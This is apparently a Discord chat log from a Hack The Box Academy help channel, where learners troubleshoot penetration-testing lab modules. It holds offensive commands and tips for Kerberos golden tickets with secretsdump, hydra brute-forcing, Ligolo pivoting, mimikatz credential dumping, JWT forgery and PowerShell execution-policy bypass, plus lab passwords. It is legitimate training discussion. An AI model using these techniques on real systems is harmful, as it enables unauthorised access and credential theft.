#modules
GUYS HELP MY EXAM IS NOT WORKING
ANY ADMIN OR MOD, PLEASE, I LOST 1 DAY BECAUSE IT DOES NOT WORK!!
@toxic palm
Need to speak to a person? Learn how to reach our support via HTB Labs.
I sent a message like 12 hours ago and no answer
be patient
Ok, but my exam time is running there are 7 days and because it is not working i lost 1 day :/
Are the labs crapping out right now or is it just me? Trying to do some of the file transfer labs in the CPTS path and getting a lot of destination host unreachable
any technical issues on HTB end in relation to exam issues time will be given back to you
webattack (skill assessment) not getting the endpoint for some reason
nvm got it after resetting and turning off proxy
not sure if it's too early to say but will the ai red teaming path become a cert once it's finished like the other job role paths
yes
job role paths will lead to certs
in my opinion; likely due to contract agreements, they released the path way before they had it ready so the cert is still being worked on
I'm in the AD enum/attacks module, attacking domain trust child/parent. I have been beating myself up for a few hours. I know how to dump the hash for the requested user using raisechild. I'm trying to do it manually, create golden ticket, and dump the hash with secretsdump. Error KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database). I'm new here so don't want to drop too much info.
Any pointers on using secretsdump with golden ticket guess is the question.
Not used this yet but i had a google and one potential workaround was leaving the admin password out and entering it when it prompts you to, someone more equipped to answer would be better.
I just can't figure out how to get it to work using secretsdump.py domain/user@ip -k -no-pass -just-dc-user domain/user. Used a different method. Just going to bug me until I figure it out.
Did you export the ccache?
Do you have a realm entry in krb5.conf?
I did export the ccache. From there I was able to get SYSTEM on the DC with PSExec using the ccache. I did not add the domain to krb5.conf.
So whats the issue?
Trying to dump the hash of a user in the parent domain with secretsdump.py. Keep getting kdc errors.
Ahh, have you tried removing the --just-dc-user arg?
Might not be able to find it if you specified it
Yes, remove that, tried just-dc, without just-dc
Try specifying a target ip as well?
Yes, tried that. Reset the lab. I also recreated the ticket for an existing domain account, just because I'm throwing darts at this point.
Yeah this is strange will have to boot up the lab myself
if you figure it out, please let me know. I moved on for about 10 minutes, but just spun it back up.
No idea. Went to spin the lab back up, it was still running. Created the ticket again. Ran secretsdump, worked perfect. Maybe being at the console for 12 hours is the problem.
maybe not, something like this happened to me too yesterday (for blind xxe module) i did the exact same thing when i came back and boom its solved i was amazed how it worked that time lol
Glad you got it working
I'm on the last question of Attacking WordPress, i tried to edit the 404.php template but got an error "Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP." I also tried with msf but i didn't get any shell.
Hello Guys, i'm on the skill assessment module of Login bruteforcing, i'm stuck at this question : What is the password for the basic auth login?
i'm doing the good command but it doesn't work... it takes too many times.. can you help me ? thank you
You using the provided wordlists?
yes .. can i show u the previous command that i'm using ?
Go ahead
Looks about right try restarting the target
Deleted the message cos its above tier 0 module btw
alright, thank you i'll try to restart it ..
Yes ! That's why i ask you before sending the command
Ok so I'm on the lab, had it working, and managed to recreate the problem, I think your issue was you were trying to authenticate to the parent DC with the fake account, you only created the ticket for the account on the child DC so it will only exist in that record, so you'd need to do secretsdump.py with: child.domain/user@dc-FQDN
Hi, I am very new to HTB and am doing the CPTS course, already stuck in the host discovery module in Network Enumeration with Nmap. I am at the end where there is a question asking what the operating system is based on the output. For this do I literally have to pick apart the output or can I use my virtual machine or spawn a workstation to just do a -O and find the operating system that way?
Ok so I wrote in it Windows just to pass it and it worked but I don't understand why it is windows?
This is the output:
Look into the output and focus on the ICMP requests, there is a subtle thing that differentiates Linux and Windows systems at the end of the respective lines
TTL value being 128?
It's funny because when I initially prompted chatGPT it told me it was most likely a linux based system due to the TTL being 128. One google search and its wrong. Got to be really careful with AI
@boreal cypress please don't post so much content of modules above tier 0. This contained spoilers so I removed it as per the rules
Good boy
Maybe make your modules on par with their price. You cant ask 500 cubes for a module that is explained poorly and expect your customers to not help each other.
I am sorry but I am not affiliated with the content team. If you think there is a mistake, please post in #1234357888114364508 (I am just a volunteer Discord moderator)
Or contact support
is there a dnscat2 version available for aarch64?
I believe yes, in the black arch repository
Nah man, you are a volunteer discord moderator with a cute dog
Didn't expect the Password Attacks Module to whoop my ass so bad
hello guys anyone know how to Mounting Bit-locker encrypted vhd in hard lab , password attack ??
if you use the search function you'll see people have linked several different articles regarding it
https://academy.hackthebox.com/module/51/section/1588
bro where is flag ?
i get root but there is no flag ? nothing in /home too .
/root/?
the module references mounting root to a location. also don't reveal module content; LPE is above tier 0
look around /mnt/root a bit
i.e. cd /mnt/root/root
thz man
Hi everyone hope you are doing well, ive one question! currently im doing attacking authentication module and currently on jwt algorithm confusion attack. im doing the same steps like mentioned but its throwing error. any help will be appreciated.
```
python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTc0NTg1ODI5MX0.<SNIP> ASIYNejb12GEuZjhVNZ0oyqgqUbVOtipqdiiZyZ02A7Zl24rOxiZCkD-iudtSSccWBKFZrzLwWHIegYAbmc1-qleXZ1UOGU4hDXq4iucdZfxnXQnlIFHZc7V0PMlUtjtvuecppcCyYQMlCJ-TYyU6dslJoiMsk7O0ITdMvUmMwtztukKfXvXZ6bUX4ZZsFYh1eRgb20l04LAMLWyVFsVEYOa-CH5eyFb5lqgZRoOGSeL-D--mecWVJkwGY4ogx8XSh2RVxkT1SlkdTZ6cQ4wns94zEpjAO4xvgk0-0jAgk1ME8-VfFAfgWEK6WIJXbI8dgBZSa14WqSyBj9nyFek9w<SNIP>
```
Hey everyone, I'm stuck on the "Model Evaluation (Network Anomaly Detection)" section of the "Applications of AI in InfoSec" Module being part of the "AI Red Teamer" path. When I upload my local created module file to e.g. to: http://10.129.205.188:8001 the message is "Invalid model file" despite of that I (believe) have followed the instructions. In the module section before "Model Evaluation (Spam Detection)" my module was accepted. Did anyone come around the same challenge? Any ideas are very welcome and thanks in advance!
Hello
Im doing web attacks module
Chaining IDOR vulnerabilities
I tried to fuzz for users in order to find the admin user with the flag but i only get the first 10 users
What am i expected to do?
First things first please put some effort in your question, try to provide more context. For example what were the steps you did? Like I don't even know which section you are referring to even though I just had to open the module.
till how many id's did you fuzz a 100?
Yes
try 200 if not then I would say use a bash script with curl and grep "admin". I can dm you blue print bash script to enumerate users
sorry so currently im doing Attacking Authentication Mechanisms > JWT > algorithm confusion part. so i was able to get public key and then now ive PEM file. now im trying to sign that PEM output with jwt sign in cyberchef and its showing error '' Error translating from ArrayBuffer to JSON: SyntaxError: No number after minus sign in JSON at position 1 (line 1 column 2)''
help
the question asks me to enter the first line of the healthcheck.log but still goes wrong when it enter this:
PS C:\ Get-Content -Nhealthcheck.log -Totalcount 1
System health check at 2025-02-24 14:26:46 - CPU Usage: 12%
are you signing it as raw json?
yes i copied the pem output directly to codechef JWTsign box ( secret key placeholder).
maybe there is a thing you need to do before signing the value you provide to codechef
Skills Assessment
Shells & Payloads
im on the 5th question.
I can seem to find a surface for the shell
https://academy.hackthebox.com/module/115/section/1139
Read the blog carefully, there is an exploit that can be exploited to get a shell
Q4 directly relates to Q5
Im on the last question of Shells & Payloads, I have a PS shell but can't seem to navigate to the flag text file
Im not very good with powershell
"Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt"
Maybe Get-Content, or type
Also if you used msf: did you type "shell" after it completed?
I uploaded the payload myself, tried type, gc, Get-Content..
Doesn't even let me cd C:\
it stays in the same directory
do you have admin privs?
nope
am i meant to upload a payload that gets me admin privs directly?
Hello, I'm working on the password attacks module on mutated passwords, brute-forcing ssh password with hydra took me one evening and gave me no result, plus the pwnbox is not indefinitely extensible. Is it a hint to do it with my own virtual machine or is it also possible from pwnbox and I'm doing something wrong ?
PS : I used the exact command but I didn't add the "-t 4" to slow password cracking
look closely at the error; "Cannot find path because it does not exist"
the exploit that you use should be a common exploit, the hostname should very much give it away
don't attack ssh
ssh is VERY slow and annoying to attack
there are other services running which will net results way faster
read the question carefully. Bruteforce the password, then log in with ssh.
sorry i use a different password for all my running services so i can lock myself out 
Better than reusing a weak password for everything
plot twist: i'm the admin that has to reset my passwords
Oh!! Ok, guess I've been reckless on this one. Thank you both @fathom pendant @west canopy
it's easy to get sucked into the trap of following the question; but this module is notorious for giving you the end-step and not giving you a middle
the end step is xyz but the start is abc
Yes indeed, plus it gives the chance to review what was learned on the previous modules. I was too focused on the objectives. Thanks for the hint
ok so I am that guy. :/ is it normal for the imaps server when connecting to it by openssl really that slow in responding? or is it something I am doing wrong. Tried both the HTB terminal as well as vpn from kali. always seems to hang...
Don't run the vpn and pwnbox at the same time, for one
Second, have you tried changing vpn regions or switching to TCP download?
using pwnbox?
The in-browser vm
That has to be running to get the (terrible) in-browser terminal
I usually use the vpn. but when it was having issues I spun up the pwnbox to see if that would work better. so do not have both connected at the same time?
Correct
It's because they both use the same config file to connect to the vpn server
ok will try that.
That makes a lot more sense now.
Thank you!
So you get collisions, as both machines are assigned the same ip under the same network
That would have been an AWESOME note somewhere in the instructions. lol or I totally missed it in the instructions
All you need to know about the VPN Connection for Academy
Learn how to connect to the VPN and access Machines on HTB Labs.
yep I totally missed it. Sorry about that and thank you very much for your help
is this forum post still relevant to the lab? https://forum.hackthebox.com/t/footprinting-lab-hard/250716
doesnt seem to align with the lab description.
Should still be valid
thx
From the looks: it looks like you didn't even attempt and just looked for solution instead of even trying different things
Not sure how you managed to assume all that from just a question and the link but i wasnt getting snmp services enumerated with the IP on a -p- nmap scan
Some services are on udp
good point. thanks for the reminder. got a lil tunnel vision.
I find HTBs explanation of the The Merkle Tree Structure in the Information Gathering - Web Edition module to be contradictory to my understanding of how hashing works maybe im 2 digit iq but it makes no sense to me
if hash 1 is cert 1 hash + cert 2 hash how would you verify hash 1 without the hash of cert 1 if you only have the hash of cert 2
In cryptography and computer science, a hash tree or Merkle tree is a tree in which every "leaf" node is labelled with the cryptographic hash of a data block, and every node that is not a leaf (called a branch, inner node, or inode) is labelled with the cryptographic hash of the labels of its child nodes. A hash tree allows efficient and secure ...
also how do you verify the root hash without hash 2 if the root hash is = hash 1 + hash 2
is there some mathematics im missing
yeah there is some maths you're missing
but this is not what it says in the module
Hi, any tutorial to help me complete hack the box academy Pentest in a nutshell?
I meant this
anyway i doubt no one cares about that
its such a small part
so the thing you're missing: is that the hashing concatenates the hashes of the leaves
so it's not adding 'a123' and 'b456'; it's combining them into 'a123b456' and hashing that
"For example, in the picture, the integrity of data block L2 can be verified immediately if the tree already contains hash 0-0 and hash 1 by hashing the data block and iteratively combining the result with hash 0-0 and then hash 1 and finally comparing the result with the top hash. Similarly, the integrity of data block L3 can be verified if the tree already has hash 1-1 and hash 0." this is from the wikipedia article and its not the same as the explanation in htb
it is the same explanation; just worded differently
in htb they say you would need hash 0 instead of hash 1
Hash 1 is the hashes of the certs of leaves 1 and 2 concatenated and hashed
but how do you get hash 1 if you dont have leaf 1?
well that's the thing with CTLs; they'd be available for you to find
it's not like they just don't exist
they have to exist
For instance, to verify Cert 2 (blog.inlanefreight.com), you would need:
Cert 2's hash: This directly verifies the certificate itself.
Hash 1: Verifies that Cert 2's hash is correctly paired with Cert 1's hash.
Root Hash: Confirms that Hash 1 is a valid part of the overall log structure.
you're not gonna run into a case where you won't have access to a cert you can't verify the tree from
i thought it would be: Cert 2 itself
Hash of Cert 1 (the sibling hash)
Hash 2 (the sibling at the next level)
The Root Hash
anyway maybe im cooked
they don't really do a good job of showing that it's a vertical from the SSL cert -> hash of cert
so yeah it may be poorly explained and better to post the need for clarification in #1234357888114364508
yeah I guess I just fail to understand how you get hash 1 without both leaves
the link i just posted explains it much better
ok thanks
what specifically are you having trouble with
pointing you to a tutorial is gonna do nothing but have you rely on others to solve the problem for you
@spare river if this isnt a hallucination it might be helpful:
In a Merkle tree, the top hash (also called the Merkle root) cannot exist without the hashes below it, such as hash0 and hash1. This is because:
The Merkle root is computed from child hashes:
Each non-leaf node in a Merkle tree is the hash of the concatenation of its two child hashes.
For example:
hash_root = hash(hash0 + hash1)
So, to compute the root hash, you must have hash0 and hash1 available.
🧱 What if there's only one leaf?
If the tree has an odd number of leaf nodes, some implementations duplicate the last node to make a pair.
Example:
Only one hash (hash0)?
hash_root = hash(hash0 + hash0)
Summary:
The Merkle root requires its child hashes to be computed.
It cannot exist independently without them.
If only one child exists, it is usually duplicated to form a pair.
i only remember them BARELY from data structures class but my memory was telling me that i used to remember these similar to the way tables of contents were taught to us in school when we were writing essays...
1
1.1
1.2
1.3
2
2.1
2.2
3
3.1
4
...
you dont create a section if it doesnt have children under it, like section 4 would not be the "right" way to create the TOC.
it looks like there are SOME special circumstances where a Merkle tree would only have one leaf:
Special or Degenerate Cases:
1. Only One Leaf Node
If there's only one leaf, it becomes the root.
No child pairing needed because:
There's no need to hash up a tree - that leaf is the tree.
So:
Merkle Root = hash(leaf0)
Or just leaf0 if no further hashing is done.
2. Non-Binary Merkle Trees
In some systems, Merkle trees can be n-ary (e.g., each node has 3 or more children).
These aren't true binary Merkle trees, but still follow the pattern: parent = hash of child hashes.
The concept still applies - you can't compute a parent (or root) hash without all its children.
3. Sparse Merkle Trees (SMTs)
Used in privacy-preserving and cryptographic contexts.
Allow efficient representation of very large key-value maps.
May have branches that don't exist explicitly but are assumed default values (e.g., zero hashes).
In this case:
Root may mathematically exist even if some children are just "default" or placeholders.
Still: conceptually, the root depends on its "children," whether real or implied.
Summary:
Yes, in nearly all practical or secure implementations, a Merkle root depends on its children.
No, it's not strictly required that it have exactly two child nodes in all implementations (e.g., odd leaf counts or 1-leaf trees).
The core rule is: the root exists only as a function of the hashes beneath it - not independently.
again take that info with a grain of salt its gpt
Well yes I agree with this and this is what im trying to say xD "The Merkle root requires its child hashes to be computed."
but this is not the case in HTB explanation
also in the HTB explanation there is an even amount of leaves
I don't see any amount of mathematical gymnastics where the HTB explanation work
but im no mathematician only slightly autistic

and even if you had both leaves you would still need hash2 and not hash1 because you already have hash1 because you have the leaves
both leaves (cert 1 + cert 2) = hash1, and hash1 + hash2 = root hash
also this is not a big deal for me personally but i need to say it because otherwise I will think about this the entire night
I had to see what claudAI said about this lol (take it with a grain of salt also):
"The explanation they provided is mathematically inconsistent. Merkle tree verification requires all sibling hashes along the path from leaf to root - that's the fundamental principle that makes the verification process work.
To be absolutely clear:
You cannot verify the Root Hash without both Hash 1 and Hash 2
If they're claiming you only need "Cert 2's hash, Hash 1, and Root Hash" for verification, that's simply incorrect from a cryptographic standpoint. The process they describe would be impossible to execute mathematically."
Kk
Hey there! I have a question about the Password Attack Skill Assessment - Medium, I finished it and would like to be sure to understand the very last step required by the lab. Would anyone who has already done it let me dm them ?
Sure
@stray pilot No. This isn't a hacker for hire server.
lmfao
are the modules for the skill path correctly in order?
yes
yo does this fr work?
if there's an odd amount of leaves; the last leaf is doubled and computed
ok so im doing the pentester skill path
did the getting start
it include almost everything like basic like nmap, enumeration, reverse shell, etc...
then the module after that getting start module is stuff with nmap again
i haven't unlock it yet
my guess is like advance nmap stuff?
Yes it explains the basic process
Then goes into different techniques
yep the biggest thing i learned from the basic modules is RTFM 
like how i learned from google and RTFM for ffuf that you can set -maxtime-job <time in seconds> to have it each job (say if you're doing a recursive scan) in a set amount of time, regardless of if it finishes the wordlist or not
there's also -maxtime if you want to set an overall limit to the process
i'd thank redoing the ffuf module for me learning that; instead of waiting for 30 minutes for it to do the things
you have to basically be a subject matter expert on a particular topic and you can potentially approach customerops@hackthebox.com with the idea and work with them to create it
I wouldn't say like expert expert
more like intermediate
idk if they approached chick3nman when they made the hashcat module, but his expertise would definitely be goated for a higher tier hashcat module (he's one of the main guys that work on hashcat, he's goated FRFR)
he's like beetlejuice sometimes, you talk about hashing enough, he pops up :D (I mean this lovingly)
I'm going from reverse engineer to CPTS is like a huge change
i just read the #academy-announcements and saw someone made the dynamic analysis module
i should make mine for malware analysis with static and dynamic analysis
also teach people the YARA rule too
i've only used WinDbg (i always say it as Windy Bag) to explore BSOD dumps
Hi, Im having issues with the "Attacking SAM" page, which is inside of the "Password Attacks" module
essentially my machine is not able to host a share, ive tried a few commands but none seem to be working
This is the command im using to host the share
"sudo smbserver.py share . -smb2support"
There are a lot of ways you can file transfer, doesn't have to be with SMB.
Your command is missing an argument.
a few arguments it looks like
yeah i hate SMB transfers, im just following the module
This is from the completion guide
i used kali and the command worked for me. idk about the pwnbox since i haven't used it much. pwnbox is parrot os.
ah ok
is there an error message or anything?
Can i dm you to send images
or can i post them here
can't post things from modules above tier 0
ah ok
no errors?
Yeah theres no error, but i put it into chatgpt also to see what im doing wrong. Essentially it told me that the share i want is not being hosted, and instead it keeps defaulting to the IPC$ share
so what happens when you run the command if there are no errors, it just put you back into the terminal?
no, its kinda hard to explain without images. I think the command is running and it is accepting connections to it without me moving any files. Ima just paste it and you can delete it later
IPC$ share keeps being used, which is apparently normal when setting up a share
and also when i try to move things from the admin cmd on the victim machine. It says "directory not found"
so your command actually is working
ah okay, thats good then
you said the machine couldn't host the share but it's working and getting incoming connections.
from the public internet...
ah okay, that confused me lol, but why is it stating the share doesnt exist when i try to move files to it
are you just blindly copy-pasting from the module?
or did you modify the IP to be the pwnbox IP etc
no, i changed the directory and ip name
it's very strange that you're getting those public connections.
yeah thats what confused me in the first place
you ran the smb server from the pwnbox?
it happens to any share that i host, because in the example and walkthrough they dont get it
yh
idk sorry i have to get to bed
lmao np
Ok looks like creating a new pwnbox / lab fixed the issue. I think when creating the share at the start, i specified a local directory that doesnt exist on the machine. So it broke my whole lab
with linux/sharing if you want to specify current dir it's best to use ./ instead of just .
ah okay, yeah its a bit of a headache. I just created a directory instead
I also found the issue to why the file wasnt moving. The module might be slightly outdated or incorrect. Is there any place i can report this so it can be fixed in the future?
It isnt a big issue, but more like a "Slice of life" mod. because following the example leads to a syntax issue
if you feel there's an issue, #1234357888114364508
u funny lol
I mean, it is the right channel, they just wanted to move you there so that if anyone else has a similar complaint/issue its easy to find
noo its not that
she was right, but she said skill issue and closed the ticket
but it was rightfully closed
sometimes we just need a hand to hold
Nahh, just stand on the shoulder of giants, your issue was you were sitting down, gotta try hard to stand up
Plus its better for your posture 
true, heightmax
Sry for a lot of text but I said in my response that in the HTB example there is an even amount of leaves
since it's not really the focus of the module it's not something that they're gonna go in detail on. Likely by trying to keep it brief they skipped some info
nah the issue was layer 8 
Yeah I get it, but it's wrong but as you say it's not important
closed it so that the staff that monitor for issues in that channel don't think it's a legit issue in the module
Hey I am new to htb can anyone guide me how to start journey in htb
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hi all. When reporting & documenting the finding evidence, the module recommends writing a narrative between figures describing what is going through the pentesters head at the moment. When I'm looking at the sample report, it does not write a narrative, but rather what is happening in the figure. Which is the correct way? Which is the correct way to apply? Please delete if not allowed, as I am not sure if this is above T0
If I wrote down what I was really thinking, the report would definitely not make a professional impression. 🤪
I always describe what I did, how I proceeded and, if necessary, I show this using a screenshot
Hahaha, I think thats were I went in the wrong. If I use the same writing style as the one in the sample document, will that be sufficient?
Because IMO it's more an explanation of what is happening, not what 'the tester' was thinking at that moment to proceed.
I think I will just continue to use the sample report as an inspiration on how to report the Finding Evidence. Thank you
I think it should be a narrative of what's happening, not a narrative of what the tester is thinking
-# take with a grain of salt I haven't done the reporting module yet 
Hahaha
Thanks dude
Yeah tbf I did use a narrative on my attempt, but did not receive a passing score. I thought we were meant to give an extensive description in the finding evidence, but I think using the style in sample report is the way to go.
Keeping it minimal and clear
hi, I'm doing Active Directory Enumeration & Attacks and every time i try rdp into the machine during the practical part it always tells me incorrect pwd/username pls help. module: Deeper Down the Rabbit Hole
that's not a section... which one of these is it?
ohh the windows one thanks!
can you copy paste the exact command you're using?
rdesktop 10.129.68.35 -u htb-student -p 'Academy_student_AD!'
have you tried using xfreerdp ?
and also - xfreerdp /v:10.129.68.35 /u:htb-student /p:Academy_student_AD! /cert-ignore /bpp:8 /network:modem /compression -themes -wallpaper /clipboard /audio-mode:1 /auto-reconnect -glyph-cache /dynamic-resolution
but this will give me this error '[17:02:15:551] [1579642:1579648] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
'
i also tried the basic one without the parameters and still same error hmm
Is student capitalized in the password?
They both seem to work for me... have you tried resetting the lab? only the xfreerdp one works for me
xfreerdp /v:<IP> /u:htb-student /p:'Academy_student_AD!'
@tidal hearth
I added the single quotes to the password in case it was interpreting the !
hmmm still gives me this error "[17:23:07:647] [1595215:1595221] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[17:23:07:647] [1595215:1595221] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
[17:23:16:789] [1595215:1595221] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[17:23:16:790] [1595215:1595215] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
"
i've tried resetting the box multiple times
but i can rdesktop in but then it says incorrect password
even if i use quotes
use cert ignore
Yo
might need to run it twice or use /cert-ignore
xfreerdp /v:10.129.102.170 /u:htb-student /p:'Academy_student_AD!' /cert-ignore
still doesnt work - [17:27:51:381] [1600226:1600232] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[17:27:51:383] [1600226:1600226] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
oh wait work now thanks!
What should I do if I reached a login page
mimikatz lsadump::secrets and netexec --lsa, both should be dumping same lsa secrets right? but i can only extract the creds using netexec method, anyone know why?
I think you should login
maybe use sekurlsa module
Yh but how do I get the credentials
when you register, you make a username and a password, use those
Yh but there are specific ones that has files in them
I try bruteforce but i can't get it
Is this for a module?
Yh
you gonna specify which one?
Nocturnal
guys i have a doubt regarding the shells and payload skill assignmnt
when we logon to the target using rdp, and I try to connect to shell on target
I'm unable to connect, I used the target IP as LHOST and I dunno where I'm going wrong
Help
Generally the LHOST will be your VM, pwnbox, or in that scenario I believe the foothold you are given. If by target you mean the foothold, check your interfaces and ensure you are setting the correct one.
Helo, anyone take prolabs alchemy?
anyone here did Sliver module? i need help to chat abt smth in DMs im LOSING my mind
#1263635449335910531 , if you dont have access get identified, #welcome has instructions
what do you need?
My account back.
Got an issue with a module flag, someone available just to check if it's my mistake? (probably is)
probably be better if you could specify the exact module and section
It's in the Intermediate Network Traffic Analysis and it's the ICMP tunneling part
pretty sure i got the flag right but cant validate it
ah never mind
i think i got my mistake
Yep all good
You can shoot me a DM.
I don't have enough disk space for windows vm, can I hope to get through fundamental modules (such as windows fundamentals) and majority of easier stuff without breaking down my main os and losing all data stored on disk?
I'm pretty certain I'm supposed to add things to the /etc/hosts file but it's unwritable, is there something else I'm supposed to do? This is for the Attacking Web Applications with Ffuf module.
wdym unwritable?
sudo?
Oh am I supposed to use sudo
Need help guys
I previously redeemed a gift card on The Academy Platform, and the amount was added to my account balance. Now, I'd like to use this balance to purchase a student subscription. Can you guide me ?
Hello, I'm on password mutations (https://academy.hackthebox.com/module/147/section/1391), and running the brute force with the mutated list and user name 'sam'. it has been running for over half an hour, is that normal for this module?
btw the error here isn't the freecom rdp abort; it's the line above: Timeout waiting for activation, you were getting timeout errors -> connection issues
don't attack ssh
reach out to support
Ok
dont use hydra? or use hydra but not ssh
my phrase was: don't attack ssh, not sure how you interpreted that as "don't use hydra"
bc that's how i roll
yea well that shows poor reading comprehension, just saying
Hi, I'm struggling with the enumeration module on the oracle TNS section. The tools are installed and running, that does not seem to be the problem here. But I cannot find any credentials with odat. The solution shows ||that scott/tiger can be used / should be found.||. Furthermore, when connecting to the DB using sqlplus, I do not get a successful login / no SQL prompt. Any hints/ideas/nudges?
(the STMIP differs here as I took a break in between two several tries, obv. I tried it with the correct STMIP both times).
try resetting the target or changing vpn regions
tried resetting, but will try different region
if the issue persists; reach out to support
@full walrus ask here
I'm working on the active directory enumeration & attacks module.
For some reason, SharpHound is missing out data for domain trusts. Viewing the collected sharphound data in bloodhound, when running the 'Map Domain Trusts' query, no data is returned. However, when I use powerview's Get-DomainTrust, I can see there is a forest trust.
Why is this?
Wouldn't always trust bloodhound. Good to know other ways to do things as you have shown
Hi all. I'm working on module "Kerberos Attacks" Section "AS-REPRoasting". The task is asking me to RDP into a machine, but I'm getting a failed logon attempt error when using the provided credentials. Any ideas?
I managed to solve this by installing and using Bloodhound CE. For some reason bloodhound legacy is missing out on some information even when ingesting from the same collector. Bloodhound CE shows all the data just fine
Its probably the server, try resetting and wait a few minutes for the machine to start up.
Hm i've tried resetting it and waited like 15 minutes i'm worried i'm doing something dumb
Its logging in with the htb-student credentials right? Whats the command you are using?
Yeah. I'm just using windows rdp
Try xfreerdp /u:htb-student /p:'HTB_@cademy_stdnt!' /v:IP /dynamic-resolution /drive:kali,. where drive will give access to your files which is nice.
by windows RDP are you initially connecting to the lab via rdp from a native windows device? (the 10.129.x.x ip)
Hm. Yeah, worked thanks ❤️ guess i'll just stick to kali
Yeah
if it's your host machine: that can definitely not be a good idea, but for the most part -- using a vm is best, linux vms have tools to connect to rdp instances. Rdesktop, xfreerdp
Hi, I've just completed the Pivoting, Tunneling, and Port Forwarding module and I'm trying to practice double pivoting using Ligolo-NG. I'm currently attempting to establish a connection between 172.16.5.35 and my attacker machine (10.x.x.x), but I'm having trouble getting the second Ligolo agent to connect back.
My goal is to have multiple Ligolo sessions to pivot through several machines in the network. Could someone assist with setting up double pivoting with Ligolo-NG or explain the correct approach to achieve this?
Thanks in advance!
Roger that. Will stick to the kali machine.
port forwarding is your friend
you need to forward from host A to your attack machine port 11601
(default ligolo port)
every step needs to link back
so attack <-> A (they have the same interface connection, so they can freely communicate)
A <-> B these can freely connect because they share an interface
attack -> B via your agent on A, the communication is 1-way because B doesn't have an interface to connect to your attack machine
I have tried it and for some reason it retrieves an error "cannot assign requested address"
Add listeners listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp let agent connect to your IP.
thanks I will try once again
then you are likely trying to reserve a restricted port?
also you need to be running your ligolo proxy as sudo
at least in order to use its QoL features; such as creating interfaces and tunnels
also when you use powershell to execute the agent: first in the session
Set-ExecutionPolicy Bypass -Scope Process
Thanks, i got it
Hello,
Module : AD Enumeration & Attacks - Skills Assessment Part II
I'm really stuck on the question 8 "Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.". I've managed to obtain system rights on the SQL01 instance. Then, I tried using mimikatz on my reverse shell obtained on my meterpreter session. I got an admin hash ||starting with 136b||. I used this hash during a PTH to access the MS01 instance but it didn't work, the hash is not valid.
So i've used it on the SQL01 using evil-winrm and the Administrator account. I then reused mimikatz to try obtaining a different hash but i kept getting the same wrong hash.
I'm really lost at this point. I'd be glad if someone could help me on this one
the admin accounts may not always have the same hash; remember administrator is a "local" account to the machine, so you'll have to be more creative
That's what i thought. So i've enumerated the users and found the one starting by ||mssql||, but i couldn't reuse its hash and couldn't find its cleared password
Here's what I've done so far:
I gained access to a host at 10.129.x.x via p0wnyShell.
I transferred the Ligolo agent and successfully established a tunnel back to my attacker machine on port 443.
From my attacker machine, I can ping the internal NIC 172.16.5.15, confirming tunnel connectivity.
After internal network enumeration, I moved laterally to 172.16.5.35, and then to 172.16.6.25.
I transferred the Ligolo agent to the host at 172.16.6.25 (path: Z:) and tried to initiate a second Ligolo tunnel from there.
However, I'm unable to establish the second Ligolo connection from 172.16.6.25 back to my attacker machine.
I guess I keep missing something ^^
Did you add a listener?
I get permission denied when I tried [Agent : www-data@inlanefreight.local] » listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443
my proxy is running on port 443 that's why i ran it on 443
Okay run ligolo as root to solve that.
it runs as root
Then kill the process using port 443 but easier would be to use default port 11601 if possible.
Yes if there's no ports being blocked use port 11601.
still facing the same issue on port 11601
Permission denied?
i managed to add the listener but i cannot connect to the proxy
I'll send you a DM okay?
Sure thanks !
got a question, has anybody checked try hack me content after they studied on HTB academy for a while?
i've been on HTB academy for quite sometime but for some reason checked THM content on matters i've already learned.
i've noticed something that makes THM far superior compared to HTB academy, they tend to walk the student through like they really don't know a thing, in comparison HTB academy, it required me to do a lot of outside research, they also have a very useful feature that opens a popup window on the words that the student may forget over time such as (Active Directory OU, etc..).
has anyone noticed the same or is it just me? or is it because i'm reading something i've already learned?
Thats an opinion that'll get you crucified by many here. Most people here dislike how hand-holding THM is
It could also partially be because you already learned some of it
The value of HTB is it also teaches you to research, you're not gonna be given the exact command every time to do something, but you'll be able to extrapolate the information you need to succeed
so its not only me who have seen THM is hand holding the student through the topic
It's the main reason people dislike THM overall, among other reasons
But I, for one, don't like having my hand held. It doesn't feel rewarding to solve something when you're just given the answer
HTB modules help build your methodology to arrive at the conclusion on your own, the Skill Assessments take the module information and sum it up in the assessments
i understand this
It also doesn't enforce good note taking, why take notes if you're just gonna be given the answer
Anyone else having issues with RDP on AD path machines ? Box has been up for 10 mins, cert is ignored and the command is the following :
xfreerdp3 /v:10.129.x.x /u:Administrator /p:'HTB_@cademy_adm!' /dynamic-resolution /cert:ignore
What is the issue/error?
[15:06:46:703] [193240:0002f2e1] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[15:06:46:703] [193240:0002f2e1] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[15:06:46:942] [193240:0002f2e1] [ERROR][com.freerdp.core] - [nla_recv_pdu]: ERRCONNECT_LOGON_FAILURE [0x00020014]
